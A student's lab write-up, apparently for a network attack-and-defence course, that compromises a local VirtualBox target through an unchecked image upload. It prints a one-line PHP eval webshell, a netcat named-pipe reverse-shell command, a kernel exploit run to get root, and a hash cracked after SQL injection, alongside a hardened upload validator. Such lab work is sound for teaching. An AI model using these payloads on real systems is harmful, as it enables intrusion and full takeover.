Lab6
Network Atk&Def lab6 241840273 杨良灼
Look up the attacker machine's IP
└─$ sudo ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::9d17:dec1:4341:a804 prefixlen 64 scopeid 0x20<link>
inet6 fd17:625c:f037:2:ea4c:bd7f:25d:cb7e prefixlen 64 scopeid 0x0<global>
ether 08:00:27:3c:97:80 txqueuelen 1000 (Ethernet)
RX packets 12 bytes 4810 (4.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 29 bytes 4353 (4.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8 bytes 480 (480.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8 bytes 480 (480.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Host discovery: the target's IP is 10.0.2.9.
└─$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:3c:97:80, IPv4: 10.0.2.15
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.2.1 52:54:00:12:35:00 (Unknown: locally administered)
10.0.2.2 52:54:00:12:35:00 (Unknown: locally administered)
10.0.2.3 08:00:27:55:ff:dc (Unknown)
10.0.2.9 08:00:27:e5:cd:43 (Unknown)
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.061 seconds (124.21 hosts/sec). 4 responded
Port scan
└─$ nmap 10.0.2.9
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-17 06:00 EST
Nmap scan report for 10.0.2.9
Host is up (0.00073s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
MAC Address: 08:00:27:E5:CD:43 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.20 seconds
Its HTTP service is reachable: open port 80 in a browser at 10.0.2.9:80:

Sign up with an arbitrary account, then Login
First Name: John
Last Name: Smith
Nickname:
Password: 123456
Confirm Password: 123456
Email: test@abc.com
Birth Date: 1/January/1996
Gender: Male
Hometown:
Additional Information

We find that posts can be made freely:

Notice that the Profile page has an Upload Image feature with a file upload vulnerability; use a one-line PHP webshell plus AntSword to get a shell:

One-line webshell (trojan_251117.php5)
<?php eval($_POST['cmd']); ?>
This upload handler does not even check the file header (magic bytes) or the extension.
The uploaded file's URL:
http://10.0.2.9/data/images/posts/11.php5
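For comparison, an added example of what the missing checks look like on the defending side. This is not code from the lab or from the target application; the field name "image" and the upload directory are assumed placeholders.

```php
<?php
// Added example, not the target application's code: a hardened profile-image
// upload handler. It rejects a .php5 file containing "<?php eval(...)" at three
// points: extension allowlist, content type from magic bytes, and image decoding.
declare(strict_types=1);

// extension => MIME type libmagic reports for the file *content*
const ALLOWED = ['png' => 'image/png', 'jpg' => 'image/jpeg',
                 'jpeg' => 'image/jpeg', 'gif' => 'image/gif'];
const MAX_BYTES = 2 * 1024 * 1024;

/** Validate one $_FILES entry and return the extension to store it under. */
function validateImageUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // 1. Allowlist the extension: php, php5, phtml, etc. are all rejected.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // 2. Magic bytes: a file that starts with "<?php" is text/x-php, not an image.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // 3. It must decode as an image (a fake header with no image data fails here).
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    return $ext;
}

/** Store a validated upload under a server-generated name (assumed $uploadDir). */
function storeImageUpload(array $file, string $uploadDir): string
{
    $ext  = validateImageUpload($file);
    $name = bin2hex(random_bytes(16)) . '.' . $ext; // client never picks the name
    if (!move_uploaded_file($file['tmp_name'], $uploadDir . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}
// Defence in depth: a valid PNG can still carry PHP code in its metadata, so also
// disable script execution in the upload directory (for Apache with mod_php, an
// .htaccess containing "php_flag engine off") or serve uploads from outside the webroot.
```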
Then connect with AntSword:

Then right-click and open the virtual terminal:
(*) 基础信息
当前路径:/var/www/html/data/images/profiles
磁盘列表:/
系统信息:Linux socnet2 4.15.0-38-generic #41-Ubuntu SMP Wed Oct UTC 2018 x86-64
当前用户:www-data
(*) 输入 ashelp 查看本地命令
(www-data:/var/www/html/data/images/profiles) $
Check the system version:
(www-data:/var/www/html/data/images/profiles) $ lsb_release -a
No LSB Modules are available
Distributor ID: Ubuntu
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
(www-data:/var/www/html/data/images/profiles) $
Use a kernel exploit: upload linux/local/47163.c to the target's /tmp directory. However, the shell we have is limited, so first get a more complete one via a reverse shell:
(www-data:/var/www/html/data/images/profiles) $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.2.15 3343 > /tmp/f
Before that, listen on port 3343 (the port specified above) on the attacker machine, then run the command directly:
└─$ nc -nvlp 3343
listening on [any] 3343 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.9] 42918
bash: cannot set terminal process group (1000): Inappropriate ioctl for device
bash: no job control in this shell
www-data@socnet2:/var/www/html/data/images/profiles$ python -c "import pty;pty.spawn('/bin/bash')"
<iles$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@socnet2:/var/www/html/data/images/profiles$ ls
ls
1.png 2.png 3.png 11.php5 exp
www-data@socnet2:/var/www/html/data/images/profiles$ chmod +x exp
chmod +x exp
www-data@socnet2:/var/www/html/data/images/profiles$ ./exp
./exp
bash-4.4# id
id
uid=0(root) gid=0(root) groups=0(root), 33(www-data)
bash-4.4# whoami
whoami
root
Privilege escalation to root succeeded.
Note that this actually exploits a vulnerability the target's authors did not anticipate before release; the intended path should be:
Try SQL injection in the search box; it works.

Then use sqlmap to dump the users table and obtain the password hash; suspecting MD5, brute-force 21232f297a57a5a743894a0e4a801fc3 to recover the password:
user_email: admin@localhost.com
password: admin
From the hint of the previously uploaded monitor.py:

Reading it reveals an XML-RPC service listening on port 8000.
Then use its CPU command to spawn a reverse shell, and afterwards reverse-engineer a SUID file to escalate privileges, but I didn't manage to get it working.